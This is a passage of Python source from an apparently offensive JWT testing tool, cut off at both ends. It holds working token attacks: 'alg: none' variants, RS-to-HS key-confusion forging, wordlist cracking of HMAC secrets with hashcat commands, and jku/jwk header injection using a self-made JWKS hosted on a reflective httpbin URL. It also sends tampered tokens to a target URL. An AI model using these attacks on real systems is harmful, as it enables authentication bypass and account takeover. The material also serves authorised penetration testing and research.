84 | e = base64.urlsafe_b64encode(new_key.e.to_bytes(3, byteorder='big')) 85 | jwksbuild = buildJWKS(n, e, "jwt_tool") 86 | jwksout = {"keys": []} 87 | jwksout["keys"].append(jwksbuild) 88 | fulljwks = json.dumps(jwksout,separators=(",",":"), indent=4) 89 | with open(jwksName, 'w') as test_jwks_out: 90 | test_jwks_out.write(fulljwks) 91 | jwks_b64 = base64.b64encode(fulljwks.encode('ascii')) 92 | config = configparser.ConfigParser(allow_no_value=True) 93 | config.optionxform = str 94 | config['crypto'] = {'pubkey': pubkeyName, 95 | 'privkey': privKeyName, 96 | 'ecpubkey': ecpubkeyName, 97 | 'ecprivkey': ecprivKeyName, 98 | 'jwks': jwksName} 99 | config['services'] = {'jwt_tool_version': jwttoolvers, 100 | '# To disable the proxy option set this value to: False (no quotes)': None, 'proxy': 'localhost:8080', 101 | '# Set this to the URL you are hosting your custom JWKS file (jwttool_custom_jwks.json) - your own server, or maybe use this cheeky reflective URL (https://httpbin.org/base64/{base64-encoded_JWKS_here})': None, 102 | 'jwksloc': 'https://httpbin.org/base64/'+jwks_b64.decode(), 103 | '# Set this to the base URL of a Collaborator server, somewhere you can read live logs, a Request Bin etc.': None, 'httplistener': ''} 104 | config['customising'] = {'useragent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) jwt_tool', 105 | 'jwks_kid': 'jwt_tool'} 106 | config['input'] = {'wordlist': 'jwt-common.txt', 107 | 'commonHeaders': 'common-headers.txt', 108 | 'commonPayloads': 'common-payloads.txt'} 109 | config['argvals'] = {'# Set at runtime - changes here are ignored': None, 110 | 'sigType': '', 111 | 'targetUrl': '', 112 | 'cookies': '', 113 | 'key': '', 114 | 'keyList': '', 115 | 'keyFile': '', 116 | 'headerLoc': '', 117 | 'payloadclaim': '', 118 | 'headerclaim': '', 119 | 'payloadvalue': '', 120 | 'headervalue': '', 121 | 'canaryvalue': '', 122 | 'header': '', 123 | 'exploitType': '', 124 | 'scanMode': '', 125 | 'reqMode': '', 126 | 'postData': '', 127 | 'resCode': '', 128 | 'resSize': '', 129 | 'resContent': ''} 130 | with open(configFileName, 
'w') as configfile: 131 | config.write(configfile) 132 | cprintc("Configuration file built - review contents of \"jwtconf.ini\" to customise your options.", "cyan") 133 | cprintc("Make sure to set the \"httplistener\" value to a URL you can monitor to enable out-of-band checks.", "cyan") 134 | exit(1) 135 | 136 | def sendToken(token, cookiedict, track, headertoken="", postdata=None): 137 | if not postdata: 138 | postdata = config['argvals']['postData'] 139 | url = config['argvals']['targetUrl'] 140 | headers = {'User-agent': config['customising']['useragent']+" "+track} 141 | if headertoken: 142 | for eachHeader in headertoken: 143 | headerName, headerVal = eachHeader.split(":",1) 144 | headers[headerName] = headerVal.lstrip(" ") 145 | try: 146 | if config['services']['proxy'] == "False": 147 | if postdata: 148 | response = requests.post(url, data=postdata, headers=headers, cookies=cookiedict, proxies=False, verify=False) 149 | else: 150 | response = requests.get(url, headers=headers, cookies=cookiedict, proxies=False, verify=False) 151 | else: 152 | proxies = {'http': 'http://'+config['services']['proxy'], 'https': 'http://'+config['services']['proxy']} 153 | if postdata: 154 | response = requests.post(url, data=postdata, headers=headers, cookies=cookiedict, proxies=proxies, verify=False) 155 | else: 156 | response = requests.get(url, headers=headers, cookies=cookiedict, proxies=proxies, verify=False) 157 | if int(response.elapsed.total_seconds()) >= 9: 158 | cprintc("HTTP response took about 10 seconds or more - could be a sign of a bug or vulnerability", "cyan") 159 | return [response.status_code, len(response.content), response.content] 160 | except requests.exceptions.ProxyError as err: 161 | cprintc("[ERROR] ProxyError - check proxy is up and not set to tamper with requests\n"+str(err), "red") 162 | exit(1) 163 | 164 | def parse_dict_cookies(value): 165 | cookiedict = {} 166 | for item in value.split(';'): 167 | item = item.strip() 168 | if not item: 169 | continue 170 | if '=' not in item: 171 | cookiedict[item] = None 172 | continue 173 | name, value = item.split('=', 1) 174 | cookiedict[name] = value 175 | return cookiedict 176 | 177 | def strip_dict_cookies(value): 178 | cookiestring = "" 179 | for item in value.split(';'): 180 | if re.search('eyJ[A-Za-z0-9_\/+-]*\.eyJ[A-Za-z0-9_\/+-]*\.[A-Za-z0-9._\/+-]*', item): 181 | continue 182 | else: 183 | cookiestring += "; "+item 184 | cookiestring = cookiestring.lstrip("; ") 185 | return cookiestring 186 | 187 | def jwtOut(token, fromMod, desc=""): 188 | genTime = datetime.now().strftime('%Y-%m-%d %H:%M:%S') 189 | idFrag = genTime+str(token) 190 | logID = "jwttool_"+hashlib.md5(idFrag.encode()).hexdigest() 191 | if config['argvals']['targetUrl'] != "": 192 | curTargetUrl = config['argvals']['targetUrl'] 193 | p = re.compile('eyJ[A-Za-z0-9_\/+-]*\.eyJ[A-Za-z0-9_\/+-]*\.[A-Za-z0-9._\/+-]*') 194 | 195 | if config['argvals']['headerloc'] == "cookies": 196 | cookietoken = p.subn(token, config['argvals']['cookies'], 0) 197 | else: 198 | cookietoken = [config['argvals']['cookies'],0] 199 | 200 | if config['argvals']['headerloc'] == "headers": 201 | headertoken = [[],0] 202 | for eachHeader in args.headers: 203 | try: 204 | headerSub = p.subn(token, eachHeader, 0) 205 | headertoken[0].append(headerSub[0]) 206 | if headerSub[1] == 1: 207 | headertoken[1] = 1 208 | except: 209 | pass 210 | else: 211 | headertoken = [[],0] 212 | if args.headers: 213 | for eachHeader in args.headers: 214 | headertoken[0].append(eachHeader) 215 | 216 | if 
config['argvals']['headerloc'] == "postdata": 217 | posttoken = p.subn(token, config['argvals']['postdata'], 0) 218 | else: 219 | posttoken = [config['argvals']['postdata'],0] 220 | 221 | 222 | try: 223 | cookiedict = parse_dict_cookies(cookietoken[0]) 224 | except: 225 | cookiedict = {} 226 | 227 | 228 | 229 | # Check if token was included in substitution 230 | if cookietoken[1] == 1 or headertoken[1] == 1 or posttoken[1]: 231 | resData = sendToken(token, cookiedict, logID, headertoken[0], posttoken[0]) 232 | else: 233 | if config['argvals']['overridesub'] == "true": 234 | resData = sendToken(token, cookiedict, logID, headertoken[0], posttoken[0]) 235 | else: 236 | cprintc("[-] No substitution occurred - check that a token is included in a cookie/header in the request", "red") 237 | # cprintc(headertoken, cookietoken, "cyan") 238 | exit(1) 239 | if config['argvals']['canaryvalue']: 240 | if config['argvals']['canaryvalue'] in str(resData[2]): 241 | cprintc("[+] FOUND \""+config['argvals']['canaryvalue']+"\" in response:\n"+logID + " " + fromMod + " Response Code: " + str(resData[0]) + ", " + str(resData[1]) + " bytes", "green") 242 | else: 243 | cprintc(logID + " " + fromMod + " Response Code: " + str(resData[0]) + ", " + str(resData[1]) + " bytes", "cyan") 244 | else: 245 | if 200 <= resData[0] < 300: 246 | cprintc(logID + " " + fromMod + " Response Code: " + str(resData[0]) + ", " + str(resData[1]) + " bytes", "green") 247 | elif 300 <= resData[0] < 400: 248 | cprintc(logID + " " + fromMod + " Response Code: " + str(resData[0]) + ", " + str(resData[1]) + " bytes", "cyan") 249 | elif 400 <= resData[0] < 600: 250 | cprintc(logID + " " + fromMod + " Response Code: " + str(resData[0]) + ", " + str(resData[1]) + " bytes", "red") 251 | else: 252 | if desc != "": 253 | cprintc(logID+" - "+desc, "cyan") 254 | if not args.bare: 255 | cprintc("[+] "+token, "green") 256 | else: 257 | print(token) 258 | curTargetUrl = "Not sent" 259 | additional = "[Commandline request: "+' '.join(sys.argv[0:])+']' 260 | setLog(token, genTime, logID, fromMod, curTargetUrl, additional) 261 | try: 262 | config['argvals']['rescode'],config['argvals']['ressize'],config['argvals']['rescontent'] = str(resData[0]),str(resData[1]),str(resData[2]) 263 | except: 264 | pass 265 | 266 | def setLog(jwt, genTime, logID, modulename, targetURL, additional): 267 | logLine = genTime+" | "+modulename+" | "+targetURL+" | "+additional 268 | with open(logFilename, 'a') as logFile: 269 | logFile.write(logID+" - "+logLine+" - "+jwt+"\n") 270 | return logID 271 | 272 | def buildHead(alg, headDict): 273 | newHead = headDict 274 | newHead["alg"] = alg 275 | newHead = base64.urlsafe_b64encode(json.dumps(newHead,separators=(",",":")).encode()).decode('UTF-8').strip("=") 276 | return newHead 277 | 278 | def checkNullSig(contents): 279 | jwtNull = contents.decode()+"." 280 | return jwtNull 281 | 282 | def checkAlgNone(headDict, paylB64): 283 | alg1 = "none" 284 | newHead1 = buildHead(alg1, headDict) 285 | CVEToken0 = newHead1+"."+paylB64+"." 286 | alg = "None" 287 | newHead = buildHead(alg, headDict) 288 | CVEToken1 = newHead+"."+paylB64+"." 289 | alg = "NONE" 290 | newHead = buildHead(alg, headDict) 291 | CVEToken2 = newHead+"."+paylB64+"." 292 | alg = "nOnE" 293 | newHead = buildHead(alg, headDict) 294 | CVEToken3 = newHead+"."+paylB64+"." 
295 | return [CVEToken0, CVEToken1, CVEToken2, CVEToken3] 296 | 297 | def checkPubKeyExploit(headDict, paylB64, pubKey): 298 | try: 299 | key = open(pubKey).read() 300 | cprintc("File loaded: "+pubKey, "cyan") 301 | except: 302 | cprintc("[-] File not found", "red") 303 | exit(1) 304 | newHead = headDict 305 | newHead["alg"] = "HS256" 306 | newHead = base64.urlsafe_b64encode(json.dumps(headDict,separators=(",",":")).encode()).decode('UTF-8').strip("=") 307 | newTok = newHead+"."+paylB64 308 | newSig = base64.urlsafe_b64encode(hmac.new(key.encode(),newTok.encode(),hashlib.sha256).digest()).decode('UTF-8').strip("=") 309 | return newTok, newSig 310 | 311 | def injectpayloadclaim(payloadclaim, injectionvalue): 312 | newpaylDict = paylDict 313 | newpaylDict[payloadclaim] = castInput(injectionvalue) 314 | newPaylB64 = base64.urlsafe_b64encode(json.dumps(newpaylDict,separators=(",",":")).encode()).decode('UTF-8').strip("=") 315 | return newpaylDict, newPaylB64 316 | 317 | def injectheaderclaim(headerclaim, injectionvalue): 318 | newheadDict = headDict 319 | newheadDict[headerclaim] = castInput(injectionvalue) 320 | newHeadB64 = base64.urlsafe_b64encode(json.dumps(newheadDict,separators=(",",":")).encode()).decode('UTF-8').strip("=") 321 | return newheadDict, newHeadB64 322 | 323 | def tamperToken(paylDict, headDict, sig): 324 | cprintc("\n====================================================================\nThis option allows you to tamper with the header, contents and \nsignature of the JWT.\n====================================================================", "white") 325 | cprintc("\nToken header values:", "white") 326 | while True: 327 | i = 0 328 | headList = [0] 329 | for pair in headDict: 330 | menuNum = i+1 331 | if isinstance(headDict[pair], dict): 332 | cprintc("["+str(menuNum)+"] "+pair+" = JSON object:", "green") 333 | for subclaim in headDict[pair]: 334 | cprintc(" [+] "+subclaim+" = "+str(headDict[pair][subclaim]), "green") 335 | else: 336 | if type(headDict[pair]) == str: 337 | cprintc("["+str(menuNum)+"] "+pair+" = \""+str(headDict[pair])+"\"", "green") 338 | else: 339 | cprintc("["+str(menuNum)+"] "+pair+" = "+str(headDict[pair]), "green") 340 | headList.append(pair) 341 | i += 1 342 | cprintc("["+str(i+1)+"] *ADD A VALUE*", "white") 343 | cprintc("["+str(i+2)+"] *DELETE A VALUE*", "white") 344 | cprintc("[0] Continue to next step", "white") 345 | selection = "" 346 | cprintc("\nPlease select a field number:\n(or 0 to Continue)", "white") 347 | try: 348 | selection = int(input("> ")) 349 | except: 350 | cprintc("Invalid selection", "red") 351 | exit(1) 352 | if selection0: 353 | if isinstance(headDict[headList[selection]], dict): 354 | cprintc("\nPlease select a sub-field number for the "+pair+" claim:\n(or 0 to Continue)", "white") 355 | newVal = OrderedDict() 356 | for subclaim in headDict[headList[selection]]: 357 | newVal[subclaim] = headDict[pair][subclaim] 358 | newVal = buildSubclaim(newVal, headList, selection) 359 | headDict[headList[selection]] = newVal 360 | else: 361 | cprintc("\nCurrent value of "+headList[selection]+" is: "+str(headDict[headList[selection]]), "white") 362 | cprintc("Please enter new value and hit ENTER", "white") 363 | newVal = input("> ") 364 | headDict[headList[selection]] = castInput(newVal) 365 | elif selection == i+1: 366 | cprintc("Please enter new Key and hit ENTER", "white") 367 | newPair = input("> ") 368 | cprintc("Please enter new value for "+newPair+" and hit ENTER", "white") 369 | newInput = input("> ") 370 | headList.append(newPair) 
371 | headDict[headList[selection]] = castInput(newInput) 372 | elif selection == i+2: 373 | cprintc("Please select a Key to DELETE and hit ENTER", "white") 374 | i = 0 375 | for pair in headDict: 376 | menuNum = i+1 377 | cprintc("["+str(menuNum)+"] "+pair+" = "+str(headDict[pair]), "white") 378 | headList.append(pair) 379 | i += 1 380 | try: 381 | delPair = int(input("> ")) 382 | except: 383 | cprintc("Invalid selection", "red") 384 | exit(1) 385 | del headDict[headList[delPair]] 386 | elif selection == 0: 387 | break 388 | else: 389 | exit(1) 390 | cprintc("\nToken payload values:", "white") 391 | while True: 392 | comparestamps, expiredtoken = dissectPayl(paylDict, count=True) 393 | i = 0 394 | paylList = [0] 395 | for pair in paylDict: 396 | menuNum = i+1 397 | paylList.append(pair) 398 | i += 1 399 | cprintc("["+str(i+1)+"] *ADD A VALUE*", "white") 400 | cprintc("["+str(i+2)+"] *DELETE A VALUE*", "white") 401 | if len(comparestamps) > 0: 402 | cprintc("["+str(i+3)+"] *UPDATE TIMESTAMPS*", "white") 403 | cprintc("[0] Continue to next step", "white") 404 | selection = "" 405 | cprintc("\nPlease select a field number:\n(or 0 to Continue)", "white") 406 | try: 407 | selection = int(input("> ")) 408 | except: 409 | cprintc("Invalid selection", "red") 410 | exit(1) 411 | if selection0: 412 | if isinstance(paylDict[paylList[selection]], dict): 413 | cprintc("\nPlease select a sub-field number for the "+str(paylList[selection])+" claim:\n(or 0 to Continue)", "white") 414 | newVal = OrderedDict() 415 | for subclaim in paylDict[paylList[selection]]: 416 | newVal[subclaim] = paylDict[paylList[selection]][subclaim] 417 | newVal = buildSubclaim(newVal, paylList, selection) 418 | paylDict[paylList[selection]] = newVal 419 | else: 420 | cprintc("\nCurrent value of "+paylList[selection]+" is: "+str(paylDict[paylList[selection]]), "white") 421 | cprintc("Please enter new value and hit ENTER", "white") 422 | newVal = input("> ") 423 | paylDict[paylList[selection]] = castInput(newVal) 424 | elif selection == i+1: 425 | cprintc("Please enter new Key and hit ENTER", "white") 426 | newPair = input("> ") 427 | cprintc("Please enter new value for "+newPair+" and hit ENTER", "white") 428 | newVal = input("> ") 429 | try: 430 | newVal = int(newVal) 431 | except: 432 | pass 433 | paylList.append(newPair) 434 | paylDict[paylList[selection]] = castInput(newVal) 435 | elif selection == i+2: 436 | cprintc("Please select a Key to DELETE and hit ENTER", "white") 437 | i = 0 438 | for pair in paylDict: 439 | menuNum = i+1 440 | cprintc("["+str(menuNum)+"] "+pair+" = "+str(paylDict[pair]), "white") 441 | paylList.append(pair) 442 | i += 1 443 | delPair = eval(input("> ")) 444 | del paylDict[paylList[delPair]] 445 | elif selection == i+3: 446 | cprintc("Timestamp updating:", "white") 447 | cprintc("[1] Update earliest timestamp to current time (keeping offsets)", "white") 448 | cprintc("[2] Add 1 hour to timestamps", "white") 449 | cprintc("[3] Add 1 day to timestamps", "white") 450 | cprintc("[4] Remove 1 hour from timestamps", "white") 451 | cprintc("[5] Remove 1 day from timestamps", "white") 452 | cprintc("\nPlease select an option from above (1-5):", "white") 453 | try: 454 | selection = int(input("> ")) 455 | except: 456 | cprintc("Invalid selection", "red") 457 | exit(1) 458 | if selection == 1: 459 | nowtime = int(datetime.now().timestamp()) 460 | timecomp = {} 461 | for timestamp in comparestamps: 462 | timecomp[timestamp] = paylDict[timestamp] 463 | earliest = min(timecomp, key=timecomp.get) 464 | earlytime = 
paylDict[earliest] 465 | for timestamp in comparestamps: 466 | if timestamp == earliest: 467 | paylDict[timestamp] = nowtime 468 | else: 469 | difftime = int(paylDict[timestamp])-int(earlytime) 470 | paylDict[timestamp] = nowtime+difftime 471 | elif selection == 2: 472 | for timestamp in comparestamps: 473 | newVal = int(paylDict[timestamp])+3600 474 | paylDict[timestamp] = newVal 475 | elif selection == 3: 476 | for timestamp in comparestamps: 477 | newVal = int(paylDict[timestamp])+86400 478 | paylDict[timestamp] = newVal 479 | elif selection == 4: 480 | for timestamp in comparestamps: 481 | newVal = int(paylDict[timestamp])-3600 482 | paylDict[timestamp] = newVal 483 | elif selection == 5: 484 | for timestamp in comparestamps: 485 | newVal = int(paylDict[timestamp])-86400 486 | paylDict[timestamp] = newVal 487 | else: 488 | cprintc("Invalid selection", "red") 489 | exit(1) 490 | elif selection == 0: 491 | break 492 | else: 493 | exit(1) 494 | if config['argvals']['sigType'] == "" and config['argvals']['exploitType'] == "": 495 | cprintc("Signature unchanged - no signing method specified (-S or -X)", "cyan") 496 | newContents = genContents(headDict, paylDict) 497 | desc = "Tampered token:" 498 | jwtOut(newContents+"."+sig, "Manual Tamper - original signature", desc) 499 | elif config['argvals']['exploitType'] != "": 500 | runExploits() 501 | elif config['argvals']['sigType'] != "": 502 | signingToken(headDict, paylDict) 503 | 504 | def signingToken(newheadDict, newpaylDict): 505 | if config['argvals']['sigType'][0:2] == "hs": 506 | key = "" 507 | if args.password: 508 | key = config['argvals']['key'] 509 | elif args.keyfile: 510 | key = open(config['argvals']['keyFile']).read() 511 | newSig, newContents = signTokenHS(newheadDict, newpaylDict, key, int(config['argvals']['sigType'][2:])) 512 | desc = "Tampered token - HMAC Signing:" 513 | jwtOut(newContents+"."+newSig, "Manual Tamper - HMAC Signing", desc) 514 | elif config['argvals']['sigType'][0:2] == "rs": 515 | newSig, newContents = signTokenRSA(newheadDict, newpaylDict, config['crypto']['privkey'], int(config['argvals']['sigType'][2:])) 516 | desc = "Tampered token - RSA Signing:" 517 | jwtOut(newContents+"."+newSig, "Manual Tamper - RSA Signing", desc) 518 | elif config['argvals']['sigType'][0:2] == "es": 519 | newSig, newContents = signTokenEC(newheadDict, newpaylDict, config['crypto']['ecprivkey'], int(config['argvals']['sigType'][2:])) 520 | desc = "Tampered token - EC Signing:" 521 | jwtOut(newContents+"."+newSig, "Manual Tamper - EC Signing", desc) 522 | elif config['argvals']['sigType'][0:2] == "ps": 523 | newSig, newContents = signTokenPSS(newheadDict, newpaylDict, config['crypto']['privkey'], int(config['argvals']['sigType'][2:])) 524 | desc = "Tampered token - PSS RSA Signing:" 525 | jwtOut(newContents+"."+newSig, "Manual Tamper - PSS RSA Signing", desc) 526 | 527 | def checkSig(sig, contents, key): 528 | quiet = False 529 | if key == "": 530 | cprintc("Type in the key to test", white) 531 | key = input("> ") 532 | testKey(key.encode(), sig, contents, headDict, quiet) 533 | 534 | def checkSigKid(sig, contents): 535 | quiet = False 536 | cprintc("\nLoading key file...", "cyan") 537 | try: 538 | key1 = open(config['argvals']['keyFile']).read() 539 | cprintc("File loaded: "+config['argvals']['keyFile'], "cyan") 540 | testKey(key1.encode(), sig, contents, headDict, quiet) 541 | except: 542 | cprintc("Could not load key file", "red") 543 | exit(1) 544 | 545 | def crackSig(sig, contents): 546 | quiet = True 547 | if 
headDict["alg"][0:2] != "HS": 548 | cprintc("Algorithm is not HMAC-SHA - cannot test against passwords, try the Verify function.", "red") 549 | return 550 | # print("\nLoading key dictionary...") 551 | try: 552 | # cprintc("File loaded: "+config['argvals']['keyList'], "cyan") 553 | keyLst = open(config['argvals']['keyList'], "r", encoding='utf-8', errors='ignore') 554 | nextKey = keyLst.readline() 555 | except: 556 | cprintc("No dictionary file loaded", "red") 557 | exit(1) 558 | # print("Testing passwords in dictionary...") 559 | utf8errors = 0 560 | wordcount = 0 561 | while nextKey: 562 | wordcount += 1 563 | try: 564 | cracked = testKey(nextKey.strip().encode('UTF-8'), sig, contents, headDict, quiet) 565 | except: 566 | cracked = False 567 | if not cracked: 568 | if wordcount % 1000000 == 0: 569 | cprintc("[*] Tested "+str(int(wordcount/1000000))+" million passwords so far", "cyan") 570 | try: 571 | nextKey = keyLst.readline() 572 | except: 573 | utf8errors += 1 574 | nextKey = keyLst.readline() 575 | else: 576 | return 577 | if cracked == False: 578 | cprintc("[-] Key not in dictionary", "red") 579 | if not args.mode: 580 | cprintc("\n===============================\nAs your list wasn't able to crack this token you might be better off using longer dictionaries, custom dictionaries, mangling rules, or brute force attacks.\nhashcat (https://hashcat.net/hashcat/) is ideal for this as it is highly optimised for speed. Just add your JWT to a text file, then use the following syntax to give you a good start:\n\n[*] dictionary attacks: hashcat -a 0 -m 16500 jwt.txt passlist.txt\n[*] rule-based attack: hashcat -a 0 -m 16500 jwt.txt passlist.txt -r rules/best64.rule\n[*] brute-force attack: hashcat -a 3 -m 16500 jwt.txt ?u?l?l?l?l?l?l?l -i --increment-min=6\n===============================\n", "cyan") 581 | if utf8errors > 0: 582 | cprintc(utf8errors, " UTF-8 incompatible passwords skipped", "cyan") 583 | 584 | def castInput(newInput): 585 | if "{" in str(newInput): 586 | try: 587 | jsonInput = json.loads(newInput) 588 | return jsonInput 589 | except ValueError: 590 | pass 591 | if "\"" in str(newInput): 592 | return newInput.strip("\"") 593 | elif newInput == "True" or newInput == "true": 594 | return True 595 | elif newInput == "False" or newInput == "false": 596 | return False 597 | elif newInput == "null": 598 | return None 599 | else: 600 | try: 601 | numInput = float(newInput) 602 | try: 603 | intInput = int(newInput) 604 | return intInput 605 | except: 606 | return numInput 607 | except: 608 | return str(newInput) 609 | return newInput 610 | 611 | def buildSubclaim(newVal, claimList, selection): 612 | while True: 613 | subList = [0] 614 | s = 0 615 | for subclaim in newVal: 616 | subNum = s+1 617 | cprintc("["+str(subNum)+"] "+subclaim+" = "+str(newVal[subclaim]), "white") 618 | s += 1 619 | subList.append(subclaim) 620 | cprintc("["+str(s+1)+"] *ADD A VALUE*", "white") 621 | cprintc("["+str(s+2)+"] *DELETE A VALUE*", "white") 622 | cprintc("[0] Continue to next step", "white") 623 | try: 624 | subSel = int(input("> ")) 625 | except: 626 | cprintc("Invalid selection", "red") 627 | exit(1) 628 | if subSel<=len(newVal) and subSel>0: 629 | selClaim = subList[subSel] 630 | cprintc("\nCurrent value of "+selClaim+" is: "+str(newVal[selClaim]), "white") 631 | cprintc("Please enter new value and hit ENTER", "white") 632 | newVal[selClaim] = castInput(input("> ")) 633 | cprintc("", "white") 634 | elif subSel == s+1: 635 | cprintc("Please enter new Key and hit ENTER", "white") 636 | newPair = 
input("> ") 637 | cprintc("Please enter new value for "+newPair+" and hit ENTER", "white") 638 | newVal[newPair] = castInput(input("> ")) 639 | elif subSel == s+2: 640 | cprintc("Please select a Key to DELETE and hit ENTER", "white") 641 | s = 0 642 | for subclaim in newVal: 643 | subNum = s+1 644 | cprintc("["+str(subNum)+"] "+subclaim+" = "+str(newVal[subclaim]), "white") 645 | subList.append(subclaim) 646 | s += 1 647 | try: 648 | selSub = int(input("> ")) 649 | except: 650 | cprintc("Invalid selection", "red") 651 | exit(1) 652 | delSub = subList[selSub] 653 | del newVal[delSub] 654 | elif subSel == 0: 655 | return newVal 656 | 657 | def testKey(key, sig, contents, headDict, quiet): 658 | if headDict["alg"] == "HS256": 659 | testSig = base64.urlsafe_b64encode(hmac.new(key,contents,hashlib.sha256).digest()).decode('UTF-8').strip("=") 660 | elif headDict["alg"] == "HS384": 661 | testSig = base64.urlsafe_b64encode(hmac.new(key,contents,hashlib.sha384).digest()).decode('UTF-8').strip("=") 662 | elif headDict["alg"] == "HS512": 663 | testSig = base64.urlsafe_b64encode(hmac.new(key,contents,hashlib.sha512).digest()).decode('UTF-8').strip("=") 664 | else: 665 | cprintc("Algorithm is not HMAC-SHA - cannot test with this tool.", "red") 666 | exit(1) 667 | if testSig == sig: 668 | cracked = True 669 | if len(key) > 25: 670 | cprintc("[+] CORRECT key found:\n"+key.decode('UTF-8'), "green") 671 | else: 672 | cprintc("[+] "+key.decode('UTF-8')+" is the CORRECT key!", "green") 673 | cprintc("You can tamper/fuzz the token contents (-T/-I) and sign it using:\npython3 jwt_tool.py [options here] -S "+str(headDict["alg"])+" -p \""+key.decode('UTF-8')+"\"", "cyan") 674 | return cracked 675 | else: 676 | cracked = False 677 | if quiet == False: 678 | if len(key) > 25: 679 | cprintc("[-] "+key[0:25].decode('UTF-8')+"...(output trimmed) is not the correct key", "red") 680 | else: 681 | cprintc("[-] "+key.decode('UTF-8')+" is not the correct key", "red") 682 | return cracked 683 | 684 | def getRSAKeyPair(): 685 | #config['crypto']['pubkey'] = config['crypto']['pubkey'] 686 | privkey = config['crypto']['privkey'] 687 | cprintc("key: "+privkey, "cyan") 688 | privKey = RSA.importKey(open(privkey).read()) 689 | pubKey = privKey.publickey().exportKey("PEM") 690 | #config['crypto']['pubkey'] = RSA.importKey(config['crypto']['pubkey']) 691 | return pubKey, privKey 692 | 693 | def newRSAKeyPair(): 694 | new_key = RSA.generate(2048, e=65537) 695 | pubKey = new_key.publickey().exportKey("PEM") 696 | privKey = new_key.exportKey("PEM") 697 | return pubKey, privKey 698 | 699 | def newECKeyPair(): 700 | new_key = ECC.generate(curve='P-256') 701 | pubkey = new_key.public_key().export_key(format="PEM") 702 | privKey = new_key.export_key(format="PEM") 703 | return pubkey, privKey 704 | 705 | def signTokenHS(headDict, paylDict, key, hashLength): 706 | newHead = headDict 707 | newHead["alg"] = "HS"+str(hashLength) 708 | if hashLength == 384: 709 | newContents = genContents(newHead, paylDict) 710 | newSig = base64.urlsafe_b64encode(hmac.new(key.encode(),newContents.encode(),hashlib.sha384).digest()).decode('UTF-8').strip("=") 711 | elif hashLength == 512: 712 | newContents = genContents(newHead, paylDict) 713 | newSig = base64.urlsafe_b64encode(hmac.new(key.encode(),newContents.encode(),hashlib.sha512).digest()).decode('UTF-8').strip("=") 714 | else: 715 | newContents = genContents(newHead, paylDict) 716 | newSig = 
base64.urlsafe_b64encode(hmac.new(key.encode(),newContents.encode(),hashlib.sha256).digest()).decode('UTF-8').strip("=") 717 | return newSig, newContents 718 | 719 | def buildJWKS(n, e, kid): 720 | newjwks = {} 721 | newjwks["kty"] = "RSA" 722 | newjwks["kid"] = kid 723 | newjwks["use"] = "sig" 724 | newjwks["e"] = str(e.decode('UTF-8')) 725 | newjwks["n"] = str(n.decode('UTF-8').rstrip("=")) 726 | return newjwks 727 | 728 | def jwksGen(headDict, paylDict, jku, privKey, kid="jwt_tool"): 729 | newHead = headDict 730 | nowtime = str(int(datetime.now().timestamp())) 731 | key = RSA.importKey(open(config['crypto']['privkey']).read()) 732 | pubKey = key.publickey().exportKey("PEM") 733 | privKey = key.export_key(format="PEM") 734 | new_key = RSA.importKey(pubKey) 735 | n = base64.urlsafe_b64encode(new_key.n.to_bytes(256, byteorder='big')) 736 | e = base64.urlsafe_b64encode(new_key.e.to_bytes(3, byteorder='big')) 737 | privKeyName = config['crypto']['privkey'] 738 | newjwks = buildJWKS(n, e, kid) 739 | newHead["jku"] = jku 740 | newHead["alg"] = "RS256" 741 | key = RSA.importKey(privKey) 742 | newContents = genContents(newHead, paylDict) 743 | newContents = newContents.encode('UTF-8') 744 | h = SHA256.new(newContents) 745 | signer = PKCS1_v1_5.new(key) 746 | try: 747 | signature = signer.sign(h) 748 | except: 749 | cprintc("Invalid Private Key", "red") 750 | exit(1) 751 | newSig = base64.urlsafe_b64encode(signature).decode('UTF-8').strip("=") 752 | jwksout = json.dumps(newjwks,separators=(",",":"), indent=4) 753 | jwksbuild = {"keys": []} 754 | jwksbuild["keys"].append(newjwks) 755 | fulljwks = json.dumps(jwksbuild,separators=(",",":"), indent=4) 756 | if config['crypto']['jwks'] == "": 757 | jwksName = "jwks_jwttool_RSA_"+nowtime+".json" 758 | with open(jwksName, 'w') as test_jwks_out: 759 | test_jwks_out.write(fulljwks) 760 | else: 761 | jwksName = config['crypto']['jwks'] 762 | return newSig, newContents.decode('UTF-8'), jwksout, privKeyName, jwksName, fulljwks 763 | 764 | def jwksEmbed(newheadDict, newpaylDict): 765 | newHead = newheadDict 766 | pubKey, privKey = getRSAKeyPair() 767 | new_key = RSA.importKey(pubKey) 768 | n = base64.urlsafe_b64encode(new_key.n.to_bytes(256, byteorder='big')) 769 | e = base64.urlsafe_b64encode(new_key.e.to_bytes(3, byteorder='big')) 770 | newjwks = buildJWKS(n, e, "jwt_tool") 771 | newHead["jwk"] = newjwks 772 | newHead["alg"] = "RS256" 773 | key = privKey 774 | # key = RSA.importKey(privKey) 775 | newContents = genContents(newHead, newpaylDict) 776 | newContents = newContents.encode('UTF-8') 777 | h = SHA256.new(newContents) 778 | signer = PKCS1_v1_5.new(key) 779 | try: 780 | signature = signer.sign(h) 781 | except: 782 | cprintc("Invalid Private Key", "red") 783 | exit(1) 784 | newSig = base64.urlsafe_b64encode(signature).decode('UTF-8').strip("=") 785 | return newSig, newContents.decode('UTF-8') 786 | 787 | def signTokenRSA(headDict, paylDict, privKey, hashLength): 788 | newHead = headDict 789 | newHead["alg"] = "RS"+str(hashLength) 790 | key = RSA.importKey(open(config['crypto']['privkey']).read()) 791 | newContents = genContents(newHead, paylDict) 792 | newContents = newContents.encode('UTF-8') 793 | if hashLength == 256: 794 | h = SHA256.new(newContents) 795 | elif hashLength == 384: 796 | h = SHA384.new(newContents) 797 | elif hashLength == 512: 798 | h = SHA512.new(newContents) 799 | else: 800 | cprintc("Invalid RSA hash length", "red") 801 | exit(1) 802 | signer = PKCS1_v1_5.new(key) 803 | try: 804 | signature = signer.sign(h) 805 | except: 806 | 
